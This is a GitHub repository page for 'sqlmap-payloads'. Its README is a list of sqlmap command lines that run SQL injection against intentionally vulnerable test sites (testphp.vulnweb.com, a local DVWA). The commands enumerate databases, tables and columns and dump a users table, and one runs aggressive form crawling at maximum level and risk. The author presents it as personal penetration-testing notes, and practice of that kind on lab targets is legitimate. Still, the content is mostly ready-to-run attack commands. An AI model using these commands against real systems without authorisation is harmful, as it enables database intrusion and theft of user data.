https://github.com/galihap76/sqlmap-payloads
Sqlmap payloads for sql injection.
https://github.com/galihap76/sqlmap-payloads
exploitation hacking payload penetration-testing sql-injection sqlmap
Last synced: 5 months ago
JSON representation
Sqlmap payloads for sql injection.
- Host: GitHub
- URL: https://github.com/galihap76/sqlmap-payloads
- Owner: galihap76
- License: gpl-3.0
- Created: 2022-09-18T13:30:02.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-10-15T05:19:41.000Z (over 2 years ago)
- Last Synced: 2025-07-27T23:44:34.069Z (6 months ago)
- Topics: exploitation, hacking, payload, penetration-testing, sql-injection, sqlmap
- Homepage:
- Size: 16.6 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# SQLMAP Payloads
```
python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1
python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dbs
python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --tables
python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --columns -D information_schema -T USER_PRIVILEGES
python sqlmap.py -u "http://localhost/vulnerabilities/sqli_blind/" --cookie="id=10; PHPSESSID=39qedittgtbc7rfsm69gjvidl0; security=medium" --data="id=1&Submit=Submit" -p id --dbs
python sqlmap.py -u "http://localhost/vulnerabilities/sqli_blind/" --cookie="id=10; PHPSESSID=39qedittgtbc7rfsm69gjvidl0; security=medium" --data="id=1&Submit=Submit" -p id -D dvwa --tables --batch --threads 5
python sqlmap.py -u "http://localhost/vulnerabilities/sqli_blind/" --cookie="id=10; PHPSESSID=39qedittgtbc7rfsm69gjvidl0; security=medium" --data="id=1&Submit=Submit" -p id -T users --batch --threads 5 --dump
python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dump -D information_schema -T USER_PRIVILEGES
python sqlmap.py -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```
# Note
This is repo for my documentation if I perform penetration testing sql injection in web application using SQLMAP tool.